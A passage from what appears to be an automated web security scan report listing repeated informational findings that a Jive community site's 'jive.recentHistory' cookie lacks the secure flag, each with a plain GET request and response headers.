Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212001

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212001 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=105378 t=1313157515407297
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.148. https://www.x.com/message/212124

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212124

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212124 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=62279 t=1313157514975703
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.149. https://www.x.com/message/212170

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212170

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212170 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:34 GMT; Path=/
Vary: User-Agent
JP: D=97085 t=1313157514570063
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.150. https://www.x.com/message/212753

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212753

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212753 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:34 GMT; Path=/
Vary: User-Agent
JP: D=168395 t=1313157514196506
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.151. https://www.x.com/message/212906

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212906

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212906 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333437393b312c35333631303b312c35333631393b312c35333637393b312c35333539323b312c35333632383b312c35333636373b312c34353633303b312c35333638373b312c35333731303b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:33 GMT; Path=/
Vary: User-Agent
JP: D=62986 t=1313157513210614
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.152. https://www.x.com/message/213354

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213354

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213354 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:32 GMT; Path=/
Vary: User-Agent
JP: D=113506 t=1313157512852345
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.153. https://www.x.com/message/213546

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213546

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213546 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:32 GMT; Path=/
Vary: User-Agent
JP: D=101383 t=1313157512015652
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.154. https://www.x.com/message/213568

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213568

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213568 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=61024 t=1313157511632200
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.155. https://www.x.com/message/213571

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213571

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213571 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=67689 t=1313157511258036
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.156. https://www.x.com/message/213767

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213767

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213767 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=90276 t=1313157510953739
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.157. https://www.x.com/message/213787

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213787

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213787 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333636373b312c35333638373b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:30 GMT; Path=/
Vary: User-Agent
JP: D=78709 t=1313157510281228
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.158. https://www.x.com/message/213788

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213788

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213788 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333638373b312c35333833383b312c34353633303b312c35333731303b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:29 GMT; Path=/
Vary: User-Agent
JP: D=103606 t=1313157509903054
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.159. https://www.x.com/message/213865

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213865

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213865 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:29 GMT; Path=/
Vary: User-Agent
JP: D=179001 t=1313157509418868
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.160. https://www.x.com/message/214347

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214347

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214347 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333833383b312c35333936313b312c35333933353b312c35333839393b312c35333731303b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:28 GMT; Path=/
Vary: User-Agent
JP: D=78567 t=1313157508050072
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.161. https://www.x.com/message/214440

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214440

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214440 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333731303b312c35333933353b312c35333936313b312c35333833383b312c35333839393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=115134 t=1313157507734977
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.162. https://www.x.com/message/214618

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214618

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214618 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=71895 t=1313157507417708
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.163. https://www.x.com/message/214902

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214902

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214902 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=61141 t=1313157507100954
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.164. https://www.x.com/message/214926

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214926

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214926 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:26 GMT; Path=/
Vary: User-Agent
JP: D=86752 t=1313157506769901
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.165. https://www.x.com/message/215245

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215245

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215245 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=90525 t=1313157517859526
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.166. https://www.x.com/message/215254

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215254

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215254 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=103642 t=1313157517314351
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.167. https://www.x.com/message/215264

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215264

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215264 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:38 GMT; Path=/
Vary: User-Agent
JP: D=198038 t=1313157518364086
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.168. https://www.x.com/message/215276

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215276

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215276 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:38 GMT; Path=/
Vary: User-Agent
JP: D=113550 t=1313157518862899
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.169. https://www.x.com/message/215291

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215291

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215291 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=173612 t=1313157516935709
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.170. https://www.x.com/people/BaldGeek

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/BaldGeek HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/xcommerce-blogs?view=blog
Accept-Language: en-US
